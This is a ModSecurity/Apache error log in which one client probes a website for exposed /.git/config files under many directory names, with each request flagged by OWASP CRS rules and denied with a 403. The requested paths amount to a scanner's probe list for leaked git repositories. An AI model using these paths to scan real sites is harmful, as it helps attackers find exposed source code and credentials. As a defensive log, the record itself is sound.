[Sun Nov 17 23:56:41.889987 2024] [:error] [pid 3372498] [client 179.43.189.138:55382] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /files/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "Zzp0qf3-4Zu06LNKtEFVaQAAABM"]
[Sun Nov 17 23:56:41.890201 2024] [:error] [pid 3372498] [client 179.43.189.138:55382] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "Zzp0qf3-4Zu06LNKtEFVaQAAABM"]
[Sun Nov 17 23:56:41.890378 2024] [:error] [pid 3372498] [client 179.43.189.138:55382] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "Zzp0qf3-4Zu06LNKtEFVaQAAABM"]
[Sun Nov 17 23:56:41.890866 2024] [:error] [pid 3372502] [client 179.43.189.138:55392] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /resources/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/resources/.git/config"] [unique_id "Zzp0qYLfag_6rex-FNVRNAAAABc"]
[Sun Nov 17 23:56:41.891034 2024] [:error] [pid 3372502] [client 179.43.189.138:55392] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/resources/.git/config"] [unique_id "Zzp0qYLfag_6rex-FNVRNAAAABc"]
[Sun Nov 17 23:56:41.891199 2024] [:error] [pid 3372502] [client 179.43.189.138:55392] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/resources/.git/config"] [unique_id "Zzp0qYLfag_6rex-FNVRNAAAABc"]
[Sun Nov 17 23:56:41.897085 2024] [:error] [pid 3372500] [client 179.43.189.138:55408] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /modules/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/modules/.git/config"] [unique_id "Zzp0qSXNrulCFj7TKS97IQAAABU"]
[Sun Nov 17 23:56:41.897300 2024] [:error] [pid 3372500] [client 179.43.189.138:55408] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/modules/.git/config"] [unique_id "Zzp0qSXNrulCFj7TKS97IQAAABU"]
[Sun Nov 17 23:56:41.897478 2024] [:error] [pid 3372500] [client 179.43.189.138:55408] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/modules/.git/config"] [unique_id "Zzp0qSXNrulCFj7TKS97IQAAABU"]
[Sun Nov 17 23:56:41.899632 2024] [:error] [pid 3386427] [client 179.43.189.138:55414] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctLwAAAAI"]
[Sun Nov 17 23:56:41.899839 2024] [:error] [pid 3386427] [client 179.43.189.138:55414] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctLwAAAAI"]
[Sun Nov 17 23:56:41.900025 2024] [:error] [pid 3386427] [client 179.43.189.138:55414] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctLwAAAAI"]
[Sun Nov 17 23:56:41.901113 2024] [:error] [pid 3368396] [client 179.43.189.138:55422] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /extensions/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/extensions/.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICgAAAAU"]
[Sun Nov 17 23:56:41.901329 2024] [:error] [pid 3368396] [client 179.43.189.138:55422] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/extensions/.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICgAAAAU"]
[Sun Nov 17 23:56:41.901499 2024] [:error] [pid 3368396] [client 179.43.189.138:55422] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/extensions/.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICgAAAAU"]
[Sun Nov 17 23:56:41.903119 2024] [:error] [pid 3372501] [client 179.43.189.138:55434] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /drupal/sites/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/drupal/sites/.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5cwAAABY"]
[Sun Nov 17 23:56:41.903310 2024] [:error] [pid 3372501] [client 179.43.189.138:55434] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/drupal/sites/.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5cwAAABY"]
[Sun Nov 17 23:56:41.903481 2024] [:error] [pid 3372501] [client 179.43.189.138:55434] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/drupal/sites/.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5cwAAABY"]
[Sun Nov 17 23:56:41.912296 2024] [:error] [pid 3372499] [client 179.43.189.138:55436] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /prestashop/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/prestashop/.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zdQAAABQ"]
[Sun Nov 17 23:56:41.912479 2024] [:error] [pid 3372499] [client 179.43.189.138:55436] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/prestashop/.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zdQAAABQ"]
[Sun Nov 17 23:56:41.912636 2024] [:error] [pid 3372499] [client 179.43.189.138:55436] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/prestashop/.git/config"] [unique_id "Zzp0qTQl9SjVY23u354zdQAAABQ"]
[Sun Nov 17 23:56:41.915573 2024] [:error] [pid 3370338] [client 179.43.189.138:55438] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /docs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docs/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMZwAAAAc"]
[Sun Nov 17 23:56:41.915743 2024] [:error] [pid 3370338] [client 179.43.189.138:55438] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docs/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMZwAAAAc"]
[Sun Nov 17 23:56:41.915935 2024] [:error] [pid 3370338] [client 179.43.189.138:55438] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docs/.git/config"] [unique_id "Zzp0qYtN8Fx1_F3WiUqMZwAAAAc"]
[Sun Nov 17 23:56:41.917282 2024] [:error] [pid 3386431] [client 179.43.189.138:55450] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /documentation/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/documentation/.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm6wAAAAg"]
[Sun Nov 17 23:56:41.917451 2024] [:error] [pid 3386431] [client 179.43.189.138:55450] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/documentation/.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm6wAAAAg"]
[Sun Nov 17 23:56:41.917639 2024] [:error] [pid 3386431] [client 179.43.189.138:55450] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/documentation/.git/config"] [unique_id "Zzp0qUsENrDzGr7aL2wm6wAAAAg"]
[Sun Nov 17 23:56:41.920475 2024] [:error] [pid 3372496] [client 179.43.189.138:55454] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /data/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8hQAAABA"]
[Sun Nov 17 23:56:41.920666 2024] [:error] [pid 3372496] [client 179.43.189.138:55454] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8hQAAABA"]
[Sun Nov 17 23:56:41.920865 2024] [:error] [pid 3372496] [client 179.43.189.138:55454] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "Zzp0qRWQPpYJ_QjvKbg8hQAAABA"]
[Sun Nov 17 23:56:41.921314 2024] [:error] [pid 3372498] [client 179.43.189.138:55462] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /database/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database/.git/config"] [unique_id "Zzp0qf3-4Zu06LNKtEFVagAAABM"]
[Sun Nov 17 23:56:41.921476 2024] [:error] [pid 3372498] [client 179.43.189.138:55462] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database/.git/config"] [unique_id "Zzp0qf3-4Zu06LNKtEFVagAAABM"]
[Sun Nov 17 23:56:41.921653 2024] [:error] [pid 3372498] [client 179.43.189.138:55462] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database/.git/config"] [unique_id "Zzp0qf3-4Zu06LNKtEFVagAAABM"]
[Sun Nov 17 23:56:41.925990 2024] [:error] [pid 3386427] [client 179.43.189.138:55488] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /bower_components/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/bower_components/.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctMAAAAAI"]
[Sun Nov 17 23:56:41.926219 2024] [:error] [pid 3386427] [client 179.43.189.138:55488] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/bower_components/.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctMAAAAAI"]
[Sun Nov 17 23:56:41.926428 2024] [:error] [pid 3386427] [client 179.43.189.138:55488] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/bower_components/.git/config"] [unique_id "Zzp0qQ5EWeoyGe8h9FctMAAAAAI"]
[Sun Nov 17 23:56:41.926935 2024] [authz_core:error] [pid 3372500] [client 179.43.189.138:55478] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.git
[Sun Nov 17 23:56:41.931419 2024] [:error] [pid 3368396] [client 179.43.189.138:55490] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICwAAAAU"]
[Sun Nov 17 23:56:41.931600 2024] [:error] [pid 3368396] [client 179.43.189.138:55490] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICwAAAAU"]
[Sun Nov 17 23:56:41.931768 2024] [:error] [pid 3368396] [client 179.43.189.138:55490] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.git/config"] [unique_id "Zzp0qTXg56NcKc-8l0FICwAAAAU"]
[Sun Nov 17 23:56:41.934448 2024] [:error] [pid 3372501] [client 179.43.189.138:55506] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /shared/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/shared/.git/config"] [unique_id "Zzp0qcPhACgxtlj_6Rz5dAAAABY"]
